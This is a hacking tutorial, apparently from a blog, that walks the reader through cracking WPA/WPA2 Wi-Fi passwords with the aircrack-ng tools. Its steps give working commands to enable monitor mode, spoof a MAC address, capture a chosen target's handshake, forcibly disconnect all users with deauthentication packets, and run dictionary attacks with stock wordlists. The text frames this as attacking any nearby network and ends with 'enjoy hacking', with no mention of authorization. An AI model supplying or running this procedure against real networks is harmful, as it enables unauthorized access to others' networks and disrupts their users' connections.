Cracking WPA/WPA2 Passwords

                             CRACKING  WPA/WPA2  PASSWORDS 

 

 

 

Introduction :

Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy).

WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2. WPA2 became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard.

WPA2 has replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it introduces CCMP, a new AES-based encryption mode with strong security. Certification began in September, 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark.

Pre-shared key mode (PSK, also known as Personal mode) is designed for home and small office networks that don't require the complexity of an 802.1X authentication server. Each wireless network device encrypts the network traffic using a 256 bit key. This key may be entered either as a string of 64 hexadecimal digits, or as a passphrase of 8 to 63 printable ASCII characters. If ASCII characters are used, the 256 bit key is calculated by applying the PBKDF2 key derivation function to the passphrase, using the SSID as the salt and 4096 iterations of HMAC-SHA1.

 

 

Steps To Follow :

 

Now some of the steps that we are going to use in this tutorial are same as the previous tutorial. You can read the previous tutorial visiting here: Hacking WiFi (WEP Encryption) . For cracking WPA2 passwords there is no need to capture the data packets as in for WEP. Here we need only the HANDSHAKE. You might be wondering now what the hell is this HANDSHAKE....??? Those who already know it its good but for who came across for the first time read below.

 

HANDSHAKE : Handshake is nothing but  user re-connecting to a  network. i.e disconnecting and connecting back to the access point. 

   

 

Step 1 : 

Open the terminal window and type the following command without quotes and press ENTER key.

 

"airmon-ng"

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

 

Step 2 :

Now type the following command in the same terminal window and press ENTER key. 

"airmon-ng start wlan0"

The result will be something like 

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0] 

                                                                     (monitor mode enabled on mon0)

Step 3 (Optional) :
 

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

 

Step 4 :
 
In same terminal type this command and hit ENTER.

"airodump-ng mon0"

Now look at the terminal window and here you will see all the nearby wireless access ponits that are in your range. Select your target who you want to attack and has a  "WPA/WPA2" protection enabled. Wait  for  1-2 min. Then, press "Ctrl+c" to break the program. 
You will see a screen like this :

Step 5 :
 

open a new terminal window and type the following command and hit enter 

   

"airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0"

  
*where -c is the channel of your target.
           -w is the file to be written. you can give it any name
           --bssid is the BSSID of your target 

So replace 3 with your target's channel no, ff:ff:ff:ff:ff:ff with your target's bssid and then hit enter.
Now we have to wait for the handshake i.e user disconnecting and connecting back to our target access point.  Wait for atleast 5 mins. if still you don't get a handshake then open a new terminal and  type the following command to disconnect the users from the access point.


Step 6 :

Type this command into the new terminal window and press the Enter Key.

"aireplay-ng -0 5 -a ff:ff:ff:ff:ff:ff mon0 "

This  command will disconnect all the users connected to tatrget access point  and we will get the HANDSHAKE automatically when they reconnect. Once you get a handshake you will see it on the same screen  as in image below. 

 

Step 7 :

The file that contains the HANDSHAKE will be saved in HOME folder. Now open the HOME folder and keep it open. Location of the Root folder is : PLACES (Left top corner on desktop) >> HOME. In this folder you will see all the files that you have captured.

Step 8 :

Now to crack the password we need a WORDLIST file which 
contains huge list of passwords. So in backtrack we are already provided with two wordlist files i.e darkc0de.lst and rockyou.txt. You can find them in /pentest/passwords/wordlists folder. Drag and drop the wordlist file after -w in below command.

aircrack-ng -w 'darkc0de.lst' 'wpacrack-01.cap'

"wpacrack-01.cap"  is our captured data file located in Root folder. Just drag and drop it in the terminal. and hit enter. This will now start the password cracking process and will show the password as text.

Note:  You will see the password if the wordlist contains that password. It may yake some time to crack. It may even sometimes take  60-90 minutes. So have some patience and enjoy hacking. 

Keep Visiting For More Updates....Thank you and have a Great Day....!!!